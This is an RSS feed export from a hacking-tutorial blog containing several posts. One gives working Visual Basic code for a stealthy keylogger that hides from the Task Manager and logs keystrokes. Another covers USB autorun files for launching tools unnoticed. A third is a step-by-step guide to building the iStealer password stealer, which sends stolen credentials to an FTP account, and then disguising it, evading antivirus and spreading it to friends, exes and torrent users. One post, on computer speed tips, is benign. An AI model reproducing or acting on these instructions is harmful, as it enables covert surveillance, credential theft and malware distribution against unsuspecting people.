<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Computer Hacking &#124; Learn How To Hack &#187; Tutorials</title>
	<atom:link href="http://www.hackingaday.com/category/tutorials/feed" rel="self" type="application/rss+xml" />
	<link>http://www.hackingaday.com</link>
	<description></description>
	<lastBuildDate>Thu, 16 Dec 2010 02:10:41 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Make Your Own keylogger</title>
		<link>http://www.hackingaday.com/2010/01/make-your-own-keylogger.html</link>
		<comments>http://www.hackingaday.com/2010/01/make-your-own-keylogger.html#comments</comments>
		<pubDate>Fri, 15 Jan 2010 04:19:21 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tricks]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[keylogger]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Virus Making]]></category>

		<guid isPermaLink="false">http://www.hackingaday.com/?p=779</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2010/01/make-your-own-keylogger.html"><img align="left" hspace="5" width="125" height="125" src="http://www.hackingaday.com/wp-content/uploads/pc-virus-150x150.jpg" class="alignleft wp-post-image tfe" alt="" title="pc-virus" /></a>In this post iam gng to show You How to Make your Own keylogger ,Making A keylogger is not That much tough TThis tutorial demonstrates how to make your keylogger easily&#8230;
Intro: What a Keylogger is made of
Before we start programming, we need to answer a basic question: what is a keylogger? As the name implies [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2009/10/installing-a-keylogger-on-a-remote-machine.html' rel='bookmark' title='Permanent Link: Installing a Keylogger on a Remote Machine'>Installing a Keylogger on a Remote Machine</a></li>
<li><a href='http://www.hackingaday.com/2009/09/ardamax-keylogger-a-powerful-hacktool-to-hack-ids-and-to-log-key-strokes-of-remote-pcs.html' rel='bookmark' title='Permanent Link: Ardamax Keylogger- A powerful Hacktool to Hack ids and to Log Key strokes of remote PCs'>Ardamax Keylogger- A powerful Hacktool to Hack ids and to Log Key strokes of remote PCs</a></li>
<li><a href='http://www.hackingaday.com/2009/11/hacking-myspace-hotmail-msn-yahoo-account-password-using-keylogger.html' rel='bookmark' title='Permanent Link: Hacking Myspace, Hotmail, MSN, Yahoo account password Using Keylogger'>Hacking Myspace, Hotmail, MSN, Yahoo account password Using Keylogger</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.hackingaday.com/wp-content/uploads/pc-virus.jpg"><img class="alignleft size-full wp-image-780" title="pc-virus" src="http://www.hackingaday.com/wp-content/uploads/pc-virus.jpg" alt="pc virus Make Your Own keylogger" width="299" height="480" /></a>In this post iam gng to show You How to Make your Own keylogger ,Making A keylogger is not That much tough TThis tutorial demonstrates how to make your keylogger easily&#8230;</p>
<p>Intro: What a Keylogger is made of</p>
<p>Before we start programming, we need to answer a basic question: what is a keylogger? As the name implies (key+logger) – a keylogger is a computer program that logs (records) the keys (<span style="color: #f8941d;">keyboard</span> buttons) pressed by a user. This should be simple to understand. Lets say that I am doing something at my computer. A keylogger is also running (working) on this <span style="color: #f8941d;">computer</span>. This would mean that the keylogger is “listening” to all the keys I am pressing and it is writing all the keys to a log file of some sort. Also, as one might have guessed already, we don’t want the user to know that their keys are being logged. So this would mean that our keylogger should work relatively stealth and must not, in any case, show its presence to the user. Good, now we know what a keylogger as and we have an idea of its functions, lets move on to the next step.</p>
<p>=========================================<br />
Basic Concepts: What needs to be achieved<br />
=========================================<br />
Ok, now lets plan our program, what should such keyloger do and what it should not. Significant difference to previous section is in the sense that here we shall discuss the LOGIC, the instructions that our program will follow.<br />
Keylogger will:<br />
1 – listen to all the key strokes of the user.<br />
2 – save these keys in a log file.<br />
3 – during logging, does not reveal its presence to the user.<br />
4 – keeps doing its work as long as the used is logged on regardless of users actions.</p>
<p>==========================================<br />
Implementation: Converting logic into code<br />
==========================================<br />
We shall use Visual Basic because it is much easier and simple to understand comparing to C++ or Java as far as novice audience is concerned. Although programmers consider it somewhat lame to code in VB but truthfully speaking, its the natural language for writing hacking/cracking programs. Lets cut to the chase – start your VB6 environment and we are ready to jump the ride!</p>
<p>We need a main form, which will act as HQ to the program.</p>
<p>First of all, as our program shall run, we need to make sure it is hidden. This should be very simple to accomplish:<br />
Private Sub Form_Load()<br />
Me.Visisble = False<br />
End Sub<br />
This makes our program invisible to the human eye. To make it invisible to computers eye too, we need to add this line in the Form_Load() event App.TaskVisible = False . This enabled our logger to run in stealth mode and the regular Task Manager will not see our application. Although it will still be possible to see it in the processes tab, there are “ways” to make it hidden. Figure them out yourself, they have nothing to do with programming.</p>
<p>OK, now that our program has run in stealth mode, it should do its essential logging task. For this, we shall be using a whole load of API. These are the <a id="KonaLink2" href="http://www.hungry-hackers.com/2008/05/how-to-write-a-keylogger.html#" target="undefined"><span style="color: #f8941d;">interfaces</span></a> that the Application Platform (windows) itself provides us in those annoying dll files.</p>
<p>There are 3 methods to listen for keys:<br />
* GetAsyncKeyState<br />
* GetKeyboardState<br />
* Windows Hooks</p>
<p>Althought the last method is easier to use, this will not work on Windows98 and also it is NOT very precise. Many people use it, but as my experiences revealed, Keyboard Hooks are only a good way of blocking keys and nothing else. The most exact and precise method in my experience is GetAsyncKeyState().<br />
So lets use this function, but where is that damn thing and how to use it?</p>
<p>Private Declare Function GetAsyncKeyState Lib “USER32″ (ByVal vKey As Long) As Integer<br />
This is how we use a function already present in a dll file. In this case we are using the <span style="color: #f8941d;">user32.dll</span> and the function we are using is GetAsyncKeyState(). The arguments (Long vKey), and return value (Long) shall be discussed later, right now its enough to know that this function can listen to keystrokes.</p>
<p>What we need next is to run this function infinitely (as long as the system is running). To do this, just put a Timer control on the form and name it tmrTimer. This timer is used to run the same line of code forever. Note that a while loop with a universally true condition would also accomplish same, but the while loop will certainly hang the system and will lead to its crash as opposed to timer. Timer will not hang the system at all because a while loop tends to carry out the instruction infinitely WITHOUT any break and it also keeps the control to itself, meaning that we cannot do any other job as the loop is running (and with a universally true statement, the while loop will not let the control pass to ANYWHERE else in the program making all the code useless) while the Timer control just carries out the instuction after a set amount of time.</p>
<p>So the two possibilities are:</p>
<p>Do While 1=1<br />
‘our use of the GAKS (GetAsyncKeyState) function Loop</p>
<p>and</p>
<p>Private Sub tmrTimer_Timer()<br />
‘our use of the GAKS function<br />
End Sub</p>
<p>Timer being set, lets move on to see how the GAKS function works and how are we going to use it. Basically what the GAKS function does is that it tells us if a specific key is being pressed or not. We can use the GAKS function like this: Hey GAKS() check if the ‘A’ key is being pressed. And the GAKS function will tell us if it is being pressed or not. Sadly, we can’t communicate with processors like this, we have to use some flamboyant 007 style <img src="http://www.hungry-hackers.com/wp-includes/images/smilies/icon_razz.gif" alt=":P" title="Make Your Own keylogger" /></p>
<p>If GAKS(65)&lt;&gt;0 Then<br />
Msgbox “The ‘A’ key is being pressed”<br />
Else<br />
Msgbox “The ‘A’ key is not being pressed”<br />
End If<br />
Now lets see how this code works: GAKS uses ASCII key codes and 65 is the ASCII code for ‘A’ If the ‘A’ key is being pressed then GAKS will return a non-zero value (often 1) and if the key is not being pressed then it will return 0. Hence If GAKS(65)&lt;&gt;0 will be comprehended by the VB compiler as “If the ‘A’ key is being pressed”.</p>
<p>Sticking all this stuff together, we can use this code to write a basic functional keylogger:</p>
<p>Private Sub tmrTimer_Timer()<br />
Dim i As Integer<br />
Static data As String<br />
For i = 65 to 90 ‘represents ASCII codes from ‘A’ to ‘Z’<br />
If GAKS(i)&lt;&gt;0 Then data = data &amp; Chr(i)<br />
Next i<br />
If GAKS(32) &lt;&gt; 0 Then data = data &amp; ” ” ‘checking for the space bar<br />
If Len(data)&gt;=100 Then<br />
Msgbox “The last 100 (or a couple more) are these ” &amp; VBNewLine &amp; data<br />
data = “”<br />
End If<br />
End Sub</p>
<p>This alone is enough to create a basic functioning keylogger although it is far from practical use. But this does the very essential function of keylogger. Do try it and modify it to your needs to see how GAKS works and how do the Timer delays affect the functionality of a keylogger. Honestly speaking, the core of our keylogger is complete, we have only to sharpen it now and make it precise, accurate and comprehensive.<br />
The first problem that one encounters using GAKS is that this function is far too sensitive than required. Meaning that if we keep a key pressed for 1/10th of a second, this function will tell us that the key has been pressed for at least 2 times, while it actually was a sigle letter. For this, we must sharpen it. We need to add what I call “essential time count” to this function. This means that we need to tell it to generate a double key press only if the key has been pressed for a specified amount of time. For this, we need a whole array of counters. So open your eyes and listen attentively.</p>
<p>Dim count(0 to 255) As Integer<br />
This array is required for remembering the time count for the keys. i.e. to remember for how long the key has been pressed.</p>
<p>Private Sub tmrTimer_Timer()<br />
Dim i As Integer<br />
Const timelimit As Integer = 10<br />
Static data As String<br />
For i=0 To 255 ‘for all the ASCII codes<br />
If GAKS(i)&lt;&gt;0 Then<br />
If count(i) = 0 Then ‘if the key has just been pressed<br />
data = data &amp; Chr(i)<br />
ElseIf count(i) &lt; timelimit Then<br />
count(i) = count(i) + 1 ‘add 1 to the key count<br />
Else<br />
count(i) = 0 ‘initialize the count<br />
data = data &amp; Chr(i)<br />
End If<br />
Else ‘if the key is not being pressed<br />
count(i) = 0<br />
End If<br />
Next i<br />
End Sub</p>
<p>What we have done here is that we have set a time limit before the GAKS function will tell us that the key is being pressed. This means, in simple words, that if we press and hold the ‘A’ key, the GAKS function will not blindly tell us the ‘A’ key is being pressed, but it will wait for sometime before telling us again that the key is being pressed. This is a very important thing to do, because many users are not very fast typists and tend to press a key for somewhat longer than required.</p>
<p>Now what is left (of the basic keylogger implementation) is just that we write the keys to a file. This should be very simple:</p>
<p>Private Sub timrTimer_Timer()<br />
‘do all the fuss and listen for keystrokes<br />
‘if a key press is detected<br />
Open App.Path &amp; “\logfile.txt” For Append As #1<br />
Print #1, Chr(keycode);<br />
Close #1<br />
End Sub</p>
<p>Note that this is the very basic concept of writing a keylogger, we have yet not added autostart option and neither have we added an post-compile functionality edit options. These are advanced issues for the beginners. If you would like me to write about them, do tell me and I will write about them too, step by step. Please do comment on this article, telling me what it lacks and what was not required in it. Feel free to post this anywhere you like, just make sure you don’t use it for commercial purposes. If you have any questions about any part of it let me know and I will try to answer.</p>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2009/10/installing-a-keylogger-on-a-remote-machine.html' rel='bookmark' title='Permanent Link: Installing a Keylogger on a Remote Machine'>Installing a Keylogger on a Remote Machine</a></li>
<li><a href='http://www.hackingaday.com/2009/09/ardamax-keylogger-a-powerful-hacktool-to-hack-ids-and-to-log-key-strokes-of-remote-pcs.html' rel='bookmark' title='Permanent Link: Ardamax Keylogger- A powerful Hacktool to Hack ids and to Log Key strokes of remote PCs'>Ardamax Keylogger- A powerful Hacktool to Hack ids and to Log Key strokes of remote PCs</a></li>
<li><a href='http://www.hackingaday.com/2009/11/hacking-myspace-hotmail-msn-yahoo-account-password-using-keylogger.html' rel='bookmark' title='Permanent Link: Hacking Myspace, Hotmail, MSN, Yahoo account password Using Keylogger'>Hacking Myspace, Hotmail, MSN, Yahoo account password Using Keylogger</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2010/01/make-your-own-keylogger.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>How To Create Autorun.inf For Pendrive – Autoplay Your Tools</title>
		<link>http://www.hackingaday.com/2009/12/how-to-create-autorun-inf-for-pendrive.html</link>
		<comments>http://www.hackingaday.com/2009/12/how-to-create-autorun-inf-for-pendrive.html#comments</comments>
		<pubDate>Mon, 28 Dec 2009 06:10:41 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tips]]></category>
		<category><![CDATA[Tricks]]></category>
		<category><![CDATA[Tutorials]]></category>

		<guid isPermaLink="false">http://www.hackingaday.com/?p=549</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/12/how-to-create-autorun-inf-for-pendrive.html"><img align="left" hspace="5" width="125" src="http://lh4.ggpht.com/_7P6NGGcr3jo/Sw-okbW7vZI/AAAAAAAAA4M/jswWTQB51cc/ist1_9116667-usb-flash-memory%5B5%5D.jpg?imgmax=800" class="alignleft wp-post-image tfe" alt="ist1_9116667-usb-flash-memory" title="ist1_9116667-usb-flash-memory" /></a>When you plug-in your pen drive then its really useful to run an Autorun software it can consist of anything from hacking software to any music player.
Its really useful as you can do your work in seconds and in hacking stuff it its really important to boot up fast so that you can do your [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2008/09/enable-your-drives-to-open-cure-autorun-inf-virus.html' rel='bookmark' title='Permanent Link: Enable your DRIVES to open !! (Cure autorun.inf Virus)'>Enable your DRIVES to open !! (Cure autorun.inf Virus)</a></li>
<li><a href='http://www.hackingaday.com/2009/03/create-a-simple-beginner-virus-in-notepad.html' rel='bookmark' title='Permanent Link: Create a Simple beginner Virus in notepad'>Create a Simple beginner Virus in notepad</a></li>
<li><a href='http://www.hackingaday.com/2009/07/hacksteal-all-kinds-of-stored-passwords-using-a-pendrive.html' rel='bookmark' title='Permanent Link: Hack(steal) all kinds of stored passwords using a Pendrive'>Hack(steal) all kinds of stored passwords using a Pendrive</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>When you plug-in your pen drive then its really useful to run an <strong>Autorun</strong> software it can<img title="ist1_9116667-usb-flash-memory" src="http://lh4.ggpht.com/_7P6NGGcr3jo/Sw-okbW7vZI/AAAAAAAAA4M/jswWTQB51cc/ist1_9116667-usb-flash-memory%5B5%5D.jpg?imgmax=800" border="0" alt=" How To Create Autorun.inf For Pendrive – Autoplay Your Tools" width="110" height="73" align="right" /> consist of anything from<strong> hacking software</strong> to any music player.</p>
<p>Its really useful as you can do your work in <strong>seconds</strong> and in hacking stuff it its really important to <strong>boot up fast</strong> so that you can do your <strong>work in seconds</strong> and no body catches you rather then first loading the pen drive then navigating to the folders and then doing it. <strong>isn&#8217;t it</strong></p>
<p>So its really worthwhile to take a look at the way the <strong>windows Xp</strong> looks at the pen drive auto run program rather then making a program that’s loading automatically written<strong> C</strong>.</p>
<p><img title="pendrive" src="http://lh6.ggpht.com/_7P6NGGcr3jo/Sw-olQ3Z6DI/AAAAAAAAA4U/uLEv7I_kDCo/pendrive%5B8%5D.gif?imgmax=800" border="0" alt=" How To Create Autorun.inf For Pendrive – Autoplay Your Tools" width="523" height="200" /><br />
<span style="color: #808080;">Ok that&#8217;s the image to notify you that you a need a <strong>pen drive</strong> and a windows Xp based computer with you so as you can perform this hack <img src='http://www.hackingaday.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="How To Create Autorun.inf For Pendrive – Autoplay Your Tools" /> </span></p>
<p>So lets start…</p>
<p><a name="more"></a></p>
<h2>How to create a Autorun.inf file ?</h2>
<p>Its the most simple part of it.</p>
<p>1. To create an autorun file<br />
2. Open Notepad and save <strong>‘autorun.inf’’</strong> (with quotes)<br />
3. Save it to the root of the drive.</p>
<p><span style="color: #808080;">All it needs to have is in the first line</span></p>
<div>[autorun]</div>
<p>It was easy right <img src='http://www.hackingaday.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="How To Create Autorun.inf For Pendrive – Autoplay Your Tools" /> </p>
<h2>How To Changing Icon of Pendrive</h2>
<p><img title="PNG-usb-pendrive.png-256x256" src="http://lh4.ggpht.com/_7P6NGGcr3jo/Sw-omTgbDiI/AAAAAAAAA4E/63wQD1K6SQs/PNG-usb-pendrive.png-256x256_thumb%5B4%5D.png?imgmax=800" border="0" alt=" How To Create Autorun.inf For Pendrive – Autoplay Your Tools" width="96" height="96" align="right" /><br />
1. To create an autorun file<br />
2. Open Notepad and save <strong>‘autorun.inf’’</strong> (with quotes)<br />
3. Save it to the root of the drive.<br />
4. Then Type -<strong> </strong></p>
<div>[autorun]<br />
icon=myicon.ico<br />
label=MyLabel</div>
<p><span style="color: #808080;">Save it and remember in the root directory</span></p>
<h2>How To New Option Appear in the Autorun Menu</h2>
<p>1. To create an autorun file<br />
2. Open Notepad and save <strong>‘autorun.inf’’</strong> (with quotes)<br />
3. Save it to the root of the drive.<br />
4. Then Type -</p>
<div>[autorun]<br />
icon=default<br />
label=[<strong><span style="color: #808080;">yourlabelhere</span></strong>]<br />
action=programname.exe</div>
<p><em>Save it and exit.</em> Once again, the <strong>program has to be in the root</strong>. Now, when you plug it in, the option should appear in the menu.</p>
<h2>How To Run Programs Automatically When USB is Plugged In</h2>
<p>1. To Create an autorun file<br />
2. Open Notepad and save <strong>‘autorun.inf’’</strong> (with quotes)<br />
3. Save it to the root of the drive.<br />
4. Then Type -</p>
<div>[autorun]<br />
Icon=default<br />
label=<strong><span style="color: #808080;">YourLabelHere</span></strong><br />
open=programname.exe</div>
<p>Well That&#8217;s it, it was easy right, now take a look at this</p>
<p><img title="USB-Flash-Drive-with-Hacked-Shape-UF208-" src="http://lh6.ggpht.com/_7P6NGGcr3jo/Sw-onb6N9mI/AAAAAAAAA4I/SJuH96nGg28/USB-Flash-Drive-with-Hacked-Shape-UF208-_thumb%5B10%5D.jpg?imgmax=800" border="0" alt=" How To Create Autorun.inf For Pendrive – Autoplay Your Tools" width="240" height="154" />Hell i need that pen drive that&#8217;s <strong>awesome</strong>. just take a look at this anybody would think that its a useless <strong>damaged usb kit</strong> or something but its a <strong>pendrive</strong> <img src='http://www.hackingaday.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="How To Create Autorun.inf For Pendrive – Autoplay Your Tools" />  search on google you would find it .</p>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2008/09/enable-your-drives-to-open-cure-autorun-inf-virus.html' rel='bookmark' title='Permanent Link: Enable your DRIVES to open !! (Cure autorun.inf Virus)'>Enable your DRIVES to open !! (Cure autorun.inf Virus)</a></li>
<li><a href='http://www.hackingaday.com/2009/03/create-a-simple-beginner-virus-in-notepad.html' rel='bookmark' title='Permanent Link: Create a Simple beginner Virus in notepad'>Create a Simple beginner Virus in notepad</a></li>
<li><a href='http://www.hackingaday.com/2009/07/hacksteal-all-kinds-of-stored-passwords-using-a-pendrive.html' rel='bookmark' title='Permanent Link: Hack(steal) all kinds of stored passwords using a Pendrive'>Hack(steal) all kinds of stored passwords using a Pendrive</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/12/how-to-create-autorun-inf-for-pendrive.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How To Increase The Speed Of Computer</title>
		<link>http://www.hackingaday.com/2009/12/how-to-increase-the-speed-of-computer.html</link>
		<comments>http://www.hackingaday.com/2009/12/how-to-increase-the-speed-of-computer.html#comments</comments>
		<pubDate>Sat, 26 Dec 2009 10:43:32 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tricks]]></category>
		<category><![CDATA[Tutorials]]></category>

		<guid isPermaLink="false">http://www.hackingaday.com/?p=493</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/12/how-to-increase-the-speed-of-computer.html"><img align="left" hspace="5" width="125" height="125" src="http://www.hackingaday.com/wp-content/uploads/speed-150x150.jpg" class="alignleft wp-post-image tfe" alt="" title="speed" /></a>
In this post i will show you how to increase the speed of your computer
It is very easy to increase the speed of your computer all you need to do  is
First of all Go to Start Menu Then Click on Run

After that first type msconfig and press enter
Then an anothor window will open like [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2009/09/how-to-increase-your-intenet-speed.html' rel='bookmark' title='Permanent Link: How to increase your intenet speed'>How to increase your intenet speed</a></li>
<li><a href='http://www.hackingaday.com/2008/09/increase-internet-browsing-speed.html' rel='bookmark' title='Permanent Link: Increase Internet browsing Speed'>Increase Internet browsing Speed</a></li>
<li><a href='http://www.hackingaday.com/2009/10/top-5-vista-tweaks-to-increase-internet-speed.html' rel='bookmark' title='Permanent Link: Top 5 Vista Tweaks To Increase Internet Speed'>Top 5 Vista Tweaks To Increase Internet Speed</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.hackingaday.com/wp-content/uploads/speed.jpg"><img class="size-medium wp-image-494 aligncenter" title="speed" src="http://www.hackingaday.com/wp-content/uploads/speed-300x217.jpg" alt="speed 300x217 How To Increase The Speed Of Computer" width="300" height="217" /></a></p>
<p>In this post i will show you how to increase the speed of your computer</p>
<p>It is very easy to increase the speed of your computer all you need to do  is</p>
<p>First of all Go to Start Menu Then Click on Run</p>
<p><a href="http://www.hackingaday.com/wp-content/uploads/img1.jpg"><img class="alignnone size-full wp-image-489" title="img1" src="http://www.hackingaday.com/wp-content/uploads/img1.jpg" alt="img1 How To Increase The Speed Of Computer" width="427" height="232" /></a></p>
<p>After that first type <strong>msconfig</strong> and press enter</p>
<p>Then an anothor window will open like this.</p>
<p><a href="http://www.hackingaday.com/wp-content/uploads/img2.jpg"><img class="alignnone size-full wp-image-491" title="img2" src="http://www.hackingaday.com/wp-content/uploads/img2.jpg" alt="img2 How To Increase The Speed Of Computer" width="627" height="439" /></a></p>
<p>In that window click on the <strong>startup Tab</strong></p>
<p>Then You will see link this</p>
<p><a href="http://www.hackingaday.com/wp-content/uploads/img3.jpg"><img class="alignnone size-full wp-image-492" title="img3" src="http://www.hackingaday.com/wp-content/uploads/img3.jpg" alt="img3 How To Increase The Speed Of Computer" width="611" height="403" /></a></p>
<p>The click on<strong> Disable all</strong> (this disables all the startup programmes and hence the  systems speed will increase</p>
<p>Then next step is “again go to run” then type “<strong>%temp%</strong>” (without qoutes)—like  this</p>
<p><a href="http://www.hackingaday.com/wp-content/uploads/img-4.jpg"><img class="alignnone size-full wp-image-490" title="img 4" src="http://www.hackingaday.com/wp-content/uploads/img-4.jpg" alt="img 4 How To Increase The Speed Of Computer" width="414" height="215" /></a></p>
<p>Then a folder will be opened After it is opened Just clear all the files  present in that folder</p>
<p>And after doing this just restart your computer You can see the difference  then..</p>
<p>POst your comments If you  have any  doubts</p>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2009/09/how-to-increase-your-intenet-speed.html' rel='bookmark' title='Permanent Link: How to increase your intenet speed'>How to increase your intenet speed</a></li>
<li><a href='http://www.hackingaday.com/2008/09/increase-internet-browsing-speed.html' rel='bookmark' title='Permanent Link: Increase Internet browsing Speed'>Increase Internet browsing Speed</a></li>
<li><a href='http://www.hackingaday.com/2009/10/top-5-vista-tweaks-to-increase-internet-speed.html' rel='bookmark' title='Permanent Link: Top 5 Vista Tweaks To Increase Internet Speed'>Top 5 Vista Tweaks To Increase Internet Speed</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/12/how-to-increase-the-speed-of-computer.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>iStealer Tutorial + Download</title>
		<link>http://www.hackingaday.com/2009/12/istealer-tutorial-download.html</link>
		<comments>http://www.hackingaday.com/2009/12/istealer-tutorial-download.html#comments</comments>
		<pubDate>Tue, 22 Dec 2009 08:25:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Tutorials]]></category>

		<guid isPermaLink="false">http://govinda007.wordpress.com/2009/12/22/istealer-tutorial-download</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/12/istealer-tutorial-download.html"><img align="left" hspace="5" width="125" src="http://govinda007.files.wordpress.com/2009/12/istealer.jpg?w=300" class="alignleft wp-post-image tfe" alt="" title="" /></a>
Before we start, I just wanted to say this, This is tutorial for people which have no knowledge on configuring a iStealer server! If you have no knowledge on how to configure a iStealer server please read on!!
Also before we start we need to sign up for a free FTP service, I currently use 

Code:
http://www.drivehq.com

so [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2009/11/hacking-myspace-hotmail-msn-yahoo-account-password-using-keylogger.html' rel='bookmark' title='Permanent Link: Hacking Myspace, Hotmail, MSN, Yahoo account password Using Keylogger'>Hacking Myspace, Hotmail, MSN, Yahoo account password Using Keylogger</a></li>
<li><a href='http://www.hackingaday.com/2009/10/tutorial-on-ardamax-3-0-keyloggers.html' rel='bookmark' title='Permanent Link: Tutorial On Ardamax 3.0 Keyloggers'>Tutorial On Ardamax 3.0 Keyloggers</a></li>
<li><a href='http://www.hackingaday.com/2009/12/turkojan-tutorial.html' rel='bookmark' title='Permanent Link: Turkojan tutorial'>Turkojan tutorial</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div class="separator" style="clear:both;text-align:center;"><a href="http://govinda007.files.wordpress.com/2009/12/istealer.jpg" style="margin-left:1em;margin-right:1em;"><img border="0" src="http://govinda007.files.wordpress.com/2009/12/istealer.jpg?w=300" title="iStealer Tutorial + Download" alt=" iStealer Tutorial + Download" /></a></div>
<p>Before we start, I just wanted to say this, This is tutorial for people which have no knowledge on configuring a iStealer server! If you have no knowledge on how to configure a iStealer server please read on!!</p>
<p>Also before we start we need to sign up for a free FTP service, I currently use 
<div style="margin:5px 20px 20px;">
<div class="smallfont" style="margin-bottom:2px;">Code:</div>
<pre class="alt2" style="border:1px inset;height:34px;overflow:auto;text-align:left;width:470px;margin:0;padding:6px;">http://www.drivehq.com</pre>
</div>
<p>so use that one, sign up and now lets start!</p>
<p>Step 1 ( Obtaining iStealer ):</p>
<p>Go to the following link: </p>
<p>*Note: This file was uploaded by me, it is safe, If you don&#8217;t believe me nor want to download it search for it on google. I have been using this for a while so I consider it safe.</p>
<p>Download Link:</p>
<div style="margin:5px 20px 20px;">
<div class="smallfont" style="margin-bottom:2px;">Code:</div>
<pre class="alt2" style="border:1px inset;height:34px;overflow:auto;text-align:left;width:470px;margin:0;padding:6px;">http://www.mediafire.com/?ruiw5yummdd</pre>
</div>
<p>This application WILL be detected by your anti-virus. Of course online scanners detect it as infected.. it&#8217;s a stealer you know..if you still believe this to be infected by me please do not download!</p>
<p>Step 2: (Extracting)</p>
<p>Right Click and extract &#8220;iStealer 3.0&#8243;</p>
<p>Once extracted there should be two files. One folder called &#8220;Icon Pack&#8221; and one application called &#8220;iStealer&#8221;.</p>
<p>Double Click on &#8220;iStealer&#8221;. There should now be a menu of options.</p>
<p>IF YOU GET ERROR MISSING COMDLG32.OCX </p>
<p>You can download the missing OCX here:</p>
<div style="margin:5px 20px 20px;">
<div class="smallfont" style="margin-bottom:2px;">Code:</div>
<pre class="alt2" style="border:1px inset;height:34px;overflow:auto;text-align:left;width:470px;margin:0;padding:6px;">http://www.ocxdump.com/download-ocx-.../download.html</pre>
</div>
<p>Once you&#8217;ve downloaded the missing OCX extract it into WINDOWS&gt;SYSTEM32</p>
<p>Step 3: (Creating your password stealer server)</p>
<p>Okay once iStealer is up there should be a menu with different options.</p>
<p>Where it says host copy and paste this &#8220;ftp.drivehq.com&#8221; without quotes.</p>
<p>Where is says username enter your drivehq.com username.</p>
<p>Where is says password enter your drivehq.com password.</p>
<p>Okay Once they are all done you can decide whether you want to bind your server(password stealer)</p>
<p>with another application, song, document, picture etc! Just click &#8220;bind with another file&#8221; and choose what file you want</p>
<p>to bind your server with.</p>
<p>Once you have done that you can decide whether or not you want to change the icon. (If you skip this</p>
<p>step there will be just a default icon). Just click &#8220;Change icon then go to the folder where you extracted</p>
<p>iStealer, then open up icon pack then choose one of the icons there.</p>
<p>Once you have choosen your icon make sure ALL boxes are ticked in the &#8220;Recovery Options&#8221;.</p>
<p>Then go down to general settings and tick &#8221; Anti virtualPC / VMWare &#8221; (This will prevent the server from running on Virtual PC&#8217;s) </p>
<p>Once you have done that click &#8221; Build &#8221; and your done!</p>
<p>Step 4: Spreading/Infecting people with your server</p>
<p>This involves some skill, patience and well creativity.</p>
<p>If you want to infect a small amount of peope like a friend, ex-girlfriend etc. Just bind the server with a legitiment file some examples are: A document, song (Be Creative). Use &#8220;ShockLabs File Binder&#8221; to bind the two files together, then ZIP the server and send it via MSN Messenger.</p>
<p>Before we move on I&#8217;d suggest we make our server FUD meaning that the iStealer server is completely un-detected by all Anti-Virus engines this can be done by finidng a FUD Crypter, search around on the forums Im sure you will be able to find a free one. But you may have to invest a small amount of money on one if you cannot find any.</p>
<p>If you want to infect a majority of people I would suggest using torrents. Create a new torrent claim it to be some keygen, crack or whatever and seed! Upload your torrent to torrent sites like PirateBay and Mininova. </p>
<p>Also youtube is another method. Upload a fake video, and get people to download your server.</p>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2009/11/hacking-myspace-hotmail-msn-yahoo-account-password-using-keylogger.html' rel='bookmark' title='Permanent Link: Hacking Myspace, Hotmail, MSN, Yahoo account password Using Keylogger'>Hacking Myspace, Hotmail, MSN, Yahoo account password Using Keylogger</a></li>
<li><a href='http://www.hackingaday.com/2009/10/tutorial-on-ardamax-3-0-keyloggers.html' rel='bookmark' title='Permanent Link: Tutorial On Ardamax 3.0 Keyloggers'>Tutorial On Ardamax 3.0 Keyloggers</a></li>
<li><a href='http://www.hackingaday.com/2009/12/turkojan-tutorial.html' rel='bookmark' title='Permanent Link: Turkojan tutorial'>Turkojan tutorial</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/12/istealer-tutorial-download.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Turkojan tutorial</title>
		<link>http://www.hackingaday.com/2009/12/turkojan-tutorial.html</link>
